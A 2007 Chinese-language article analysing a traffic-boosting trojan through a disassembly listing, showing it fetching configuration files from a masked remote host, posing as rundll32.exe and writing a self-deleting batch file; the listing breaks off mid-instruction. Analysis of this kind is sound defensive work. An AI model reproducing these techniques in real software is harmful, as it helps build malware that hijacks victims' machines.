对一刷网站访问量的小马分析
作者:混世魔王    文章来源:网络    点击数:    更新时间:2007-1-13    

系统补丁打完,网上瞎灌,居然还中网马,哎!现在把这个网马下载下来,不错,真牛,通杀 Windows 98、Windows NT、Windows 2000、Windows XP、Windows XP SP2、Windows 2003。自己留着,随便分析了下这个木马。一个刷流量的木马。服了。现在小马都出到这个份上了。

脱壳过程略,程序用 VB 编写。











00403DAD   . FF15 54104000 CALL DWORD PTR DS:[<&msvbvm60.__vbaHresu>; 

msvbvm60.__vbaHresultCheckObj

00403DB3   . 8985 E0FCFFFF MOV DWORD PTR SS:[EBP-320],EAX

00403DB9   . EB 0A       JMP SHORT Rundll32.00403DC5

00403DBB   > C785 E0FCFFFF>MOV DWORD PTR SS:[EBP-320],0

00403DC5   > 8B95 60FEFFFF MOV EDX,DWORD PTR SS:[EBP-1A0]

00403DCB   . 8995 F8FCFFFF MOV DWORD PTR SS:[EBP-308],EDX

00403DD1   . C785 60FEFFFF>MOV DWORD PTR SS:[EBP-1A0],0

00403DDB   . 8B85 F8FCFFFF MOV EAX,DWORD PTR SS:[EBP-308]

00403DE1   . 8985 34FEFFFF MOV DWORD PTR SS:[EBP-1CC],EAX

00403DE7   . C785 2CFEFFFF>MOV DWORD PTR SS:[EBP-1D4],8

00403DF1   . 8D95 2CFEFFFF LEA EDX,DWORD PTR SS:[EBP-1D4]

00403DF7   . 8D8D F8FEFFFF LEA ECX,DWORD PTR SS:[EBP-108]

00403DFD   . FF15 08104000 CALL DWORD PTR DS:[<&msvbvm60.__vbaVarMo>; msvbvm60.__vbaVarMove

00403E03   . C745 FC 06000>MOV DWORD PTR SS:[EBP-4],6

00403E0A   . C785 D4FDFFFF>MOV DWORD PTR SS:[EBP-22C],Rundll32.0040>; 

UNICODE "http://www.xxxxxxxx.com/tc/adset.txt"

00403E14   . C785 CCFDFFFF>MOV DWORD PTR SS:[EBP-234],8

00403E1E   . 8D95 CCFDFFFF LEA EDX,DWORD PTR SS:[EBP-234]

00403E24   . 8D4D A0     LEA ECX,DWORD PTR SS:[EBP-60]

00403E27   . FF15 70114000 CALL DWORD PTR DS:[<&msvbvm60.__vbaVarCo>; msvbvm60.__vbaVarCopy

00403E2D   . C745 FC 07000>MOV DWORD PTR SS:[EBP-4],7

00403E34   . C785 D4FDFFFF>MOV DWORD PTR SS:[EBP-22C],Rundll32.0040>; 

UNICODE "http://www.xxxxxxxx.com/tc/adlist.txt"

00403E3E   . C785 CCFDFFFF>MOV DWORD PTR SS:[EBP-234],8

00403E48   . 8D95 CCFDFFFF LEA EDX,DWORD PTR SS:[EBP-234]

00403E4E   . 8D8D 6CFFFFFF LEA ECX,DWORD PTR SS:[EBP-94]

00403E54   . FF15 70114000 CALL DWORD PTR DS:[<&msvbvm60.__vbaVarCo>; msvbvm60.__vbaVarCopy

00403E5A   . C745 FC 08000>MOV DWORD PTR SS:[EBP-4],8

00403E61   . C785 D4FDFFFF>MOV DWORD PTR SS:[EBP-22C],Rundll32.0040>; 

UNICODE "http://www.xxxxxxxx.com/tc/MMResult.asp"

00403E6B   . C785 CCFDFFFF>MOV DWORD PTR SS:[EBP-234],8

00403E75   . 8D95 CCFDFFFF LEA EDX,DWORD PTR SS:[EBP-234]

00403E7B   . 8D4D 8C     LEA ECX,DWORD PTR SS:[EBP-74]

00403E7E   . FF15 70114000 CALL DWORD PTR DS:[<&msvbvm60.__vbaVarCo>; msvbvm60.__vbaVarCopy

00403E84   . C745 FC 09000>MOV DWORD PTR SS:[EBP-4],9

00403E8B   . C785 D4FDFFFF>MOV DWORD PTR SS:[EBP-22C],Rundll32.0040>; 

UNICODE "http://www.xxxxxxxx.com/tc/adiepage.txt"

00403E95   . C785 CCFDFFFF>MOV DWORD PTR SS:[EBP-234],8

00403E9F   . 8D95 CCFDFFFF LEA EDX,DWORD PTR SS:[EBP-234]

00403EA5   . 8D8D B8FEFFFF LEA ECX,DWORD PTR SS:[EBP-148]

00403EAB   . FF15 70114000 CALL DWORD PTR DS:[<&msvbvm60.__vbaVarCo>; msvbvm60.__vbaVarCopy

00403EB1   . C745 FC 0A000>MOV DWORD PTR SS:[EBP-4],0A

00403EB8   . C785 D4FDFFFF>MOV DWORD PTR SS:[EBP-22C],Rundll32.0040>; 

UNICODE "http://www.xxxxxxxx.com/tc/ieFavorites.txt"

00403EC2   . C785 CCFDFFFF>MOV DWORD PTR SS:[EBP-234],8

00403ECC   . 8D95 CCFDFFFF LEA EDX,DWORD PTR SS:[EBP-234]

00403ED2   . 8D8D 7CFFFFFF LEA ECX,DWORD PTR SS:[EBP-84]

00403ED8   . FF15 70114000 CALL DWORD PTR DS:[<&msvbvm60.__vbaVarCo>; msvbvm60.__vbaVarCopy

00403EDE   . C745 FC 0B000>MOV DWORD PTR SS:[EBP-4],0B

00403EE5   . C785 D4FDFFFF>MOV DWORD PTR SS:[EBP-22C],Rundll32.0040>; UNICODE "WinDir"

00403EEF   . C785 CCFDFFFF>MOV DWORD PTR SS:[EBP-234],8

00403EF9   . 8D95 CCFDFFFF LEA EDX,DWORD PTR SS:[EBP-234]

00403EFF   . 8D8D 2CFEFFFF LEA ECX,DWORD PTR SS:[EBP-1D4]

00403F05   . FF15 6C114000 CALL DWORD PTR DS:[<&msvbvm60.__vbaVarDu>; msvbvm60.__vbaVarDup

00403F0B   . 8D8D 2CFEFFFF LEA ECX,DWORD PTR SS:[EBP-1D4]

00403F11   . 51         PUSH ECX

00403F12   . 8D95 1CFEFFFF LEA EDX,DWORD PTR SS:[EBP-1E4]

00403F18   . 52         PUSH EDX

00403F19   . FF15 60104000 CALL DWORD PTR DS:[<&msvbvm60.rtcEnviron>; msvbvm60.rtcEnvironVar

00403F1F   . C785 C4FDFFFF>MOV DWORD PTR SS:[EBP-23C],Rundll32.0040>; UNICODE "\rundll32.exe"

00403F29   . C785 BCFDFFFF>MOV DWORD PTR SS:[EBP-244],8

程序会到 http://www.xxxxxxxx.com 的 tc 目录下读取配置文件,同时访问 tc/MMResult.asp,然后在本机生成批处理文件(即下面的 killme.bat):

00404DA2   . /EB 0A       JMP SHORT Rundll32.00404DAE           //获取文件路径堆栈 

00404DA4   > |C785 88FCFFFF>MOV DWORD PTR SS:[EBP-378],0       

00404DAE   > \8B85 60FEFFFF MOV EAX,DWORD PTR SS:[EBP-1A0]         //我程序路径是 "D:\fuck you" 

00404DB4   . 50         PUSH EAX                         //路径入eax   

00404DB5   . 68 80274000   PUSH Rundll32.00402780             ; //生成killme.bat

00404DBA   . FF15 48104000 CALL DWORD PTR DS:[<&msvbvm60.__vbaStrCat>; msvbvm60.__vbaStrCat

00404DC0   . 8BD0       MOV EDX,EAX                 //文件路径+文件名字D:\fuck you\killme.bat

00404DC2   . 8D8D 5CFEFFFF LEA ECX,DWORD PTR SS:[EBP-1A4]

00404DC8   . FF15 80114000 CALL DWORD PTR DS:[<&msvbvm60.__vbaStrMov>; msvbvm60.__vbaStrMove

00404DCE   . 50         PUSH EAX

00404DCF   . 6A 01       PUSH 1

00404DD1   . 6A FF       PUSH -1

00404DD3   . 6A 02       PUSH 2

00404DD5   . FF15 28114000 CALL DWORD PTR DS:[<&msvbvm60.__vbaFileOp>; msvbvm60.__vbaFileOpen

00404DDB   . 8D8D 5CFEFFFF LEA ECX,DWORD PTR SS:[EBP-1A4]

00404DE1   . 51         PUSH ECX

00404DE2   . 8D95 60FEFFFF LEA EDX,DWORD PTR SS:[EBP-1A0]

00404DE8   . 52         PUSH EDX

00404DE9   . 6A 02       PUSH 2

00404DEB   . FF15 48114000 CALL DWORD PTR DS:[<&msvbvm60.__vbaFreeSt>; msvbvm60.__vbaFreeStrList

00404DF1   . 83C4 0C     ADD ESP,0C

00404DF4   . 8D8D 40FEFFFF LEA ECX,DWORD PTR SS:[EBP-1C0]

00404DFA   . FF15 A8114000 CALL DWORD PTR DS:[<&msvbvm60.__vbaFreeOb>; msvbvm60.__vbaFreeObj

00404E00   . C745 FC 23000>MOV DWORD PTR SS:[EBP-4],23

00404E07   . 68 9C274000   PUSH Rundll32.0040279C             ; @echo off

00404E0C   . 6A 01       PUSH 1

00404E0E   . 68 B4274000   PUSH Rundll32.004027B4

00404E13   . FF15 F8104000 CALL DWORD PTR DS:[<&msvbvm60.__vbaPrintF>; msvbvm60.__vbaPrintFile

00404E19   . 83C4 0C     ADD ESP,0C

00404E1C   . C745 FC 24000>MOV DWORD PTR SS:[EBP-4],24

00404E23   . 68 BC274000   PUSH Rundll32.004027BC             ; sleep 100

00404E28   . 6A 01       PUSH 1

00404E2A   . 68 B4274000   PUSH Rundll32.004027B4

00404E2F   . FF15 F8104000 CALL DWORD PTR DS:[<&msvbvm60.__vbaPrintF>; msvbvm60.__vbaPrintFile

00404E35   . 83C4 0C     ADD ESP,0C

00404E38   . C745 FC 25000>MOV DWORD PTR SS:[EBP-4],25

00404E3F   . 833D A8934000>CMP DWORD PTR DS:[4093A8],0

00404E46   . 75 1C       JNZ SHORT Rundll32.00404E64

00404E48   . 68 A8934000   PUSH Rundll32.004093A8

00404E4D   . 68 94254000   PUSH Rundll32.00402594

00404E52   . FF15 30114000 CALL DWORD PTR DS:[<&msvbvm60.__vbaNew2>] ; msvbvm60.__vbaNew2

00404E58   . C785 84FCFFFF>MOV DWORD PTR SS:[EBP-37C],Rundll32.00409>

00404E62   . EB 0A       JMP SHORT Rundll32.00404E6E

00404E64   > C785 84FCFFFF>MOV DWORD PTR SS:[EBP-37C],Rundll32.00409>

00404E6E   > 8B85 84FCFFFF MOV EAX,DWORD PTR SS:[EBP-37C]

00404E74   . 8B08       MOV ECX,DWORD PTR DS:[EAX]

........

00404F1D   . 52         PUSH EDX

00404F1E   . FF15 54104000 CALL DWORD PTR DS:[<&msvbvm60.__vbaHresul>; msvbvm60.__vbaHresultCheckObj

00404F24   . 8985 7CFCFFFF MOV DWORD PTR SS:[EBP-384],EAX           

00404F2A   . EB 0A       JMP SHORT Rundll32.00404F36     

00404F2C   > C785 7CFCFFFF>MOV DWORD PTR SS:[EBP-384],0           

00404F36   > 68 D4274000   PUSH Rundll32.004027D4             ; del

00404F3B   . 8B85 60FEFFFF MOV EAX,DWORD PTR SS:[EBP-1A0]         //程序的文件名字

00404F41   . 50         PUSH EAX                         //文件名入栈 (rundll322)

00404F42   . 68 E4274000   PUSH Rundll32.004027E4             ; .exe   (rundll322.exe)

00404F47   . FF15 48104000 CALL DWORD PTR DS:[<&msvbvm60.__vbaStrCat>; msvbvm60.__vbaStrCat

00404F4D   . 8BD0       MOV EDX,EAX

00404F4F   . 8D8D 5CFEFFFF LEA ECX,DWORD PTR SS:[EBP-1A4]

00404F55   . FF15 80114000 CALL DWORD PTR DS:[<&msvbvm60.__vbaStrMov>; msvbvm60.__vbaStrMove

00404F5B   . 50         PUSH EAX

00404F5C   . FF15 48104000 CALL DWORD PTR DS:[<&msvbvm60.__vbaStrCat>; msvbvm60.__vbaStrCat

00404F62   . 8BD0       MOV EDX,EAX                       //(del rundll322.exe)     

00404F64   . 8D8D 58FEFFFF LEA ECX,DWORD PTR SS:[EBP-1A8]

00404F6A   . FF15 80114000 CALL DWORD PTR DS:[<&msvbvm60.__vbaStrMov>; msvbvm60.__vbaStrMove

00404F70   . 50         PUSH EAX

00404F71   . 6A 01       PUSH 1

00404F73   . 68 B4274000   PUSH Rundll32.004027B4

00404F78   . FF15 F8104000 CALL DWORD PTR DS:[<&msvbvm60.__vbaPrintF>; msvbvm60.__vbaPrintFile

00404F7E   . 83C4 0C     ADD ESP,0C

00404F81   . 8D8D 58FEFFFF LEA ECX,DWORD PTR SS:[EBP-1A8]

00404F87   . 51         PUSH ECX

00404F88   . 8D95 5CFEFFFF LEA EDX,DWORD PTR SS:[EBP-1A4]

00404F8E   . 52         PUSH EDX

00404F8F   . 8D85 60FEFFFF LEA EAX,DWORD PTR SS:[EBP-1A0]

00404F95   . 50         PUSH EAX

00404F96   . 6A 03       PUSH 3

00404F98   . FF15 48114000 CALL DWORD PTR DS:[<&msvbvm60.__vbaFreeSt>; msvbvm60.__vbaFreeStrList

00404F9E   . 83C4 10     ADD ESP,


文章录入:IceRiver    责任编辑:IceRiver 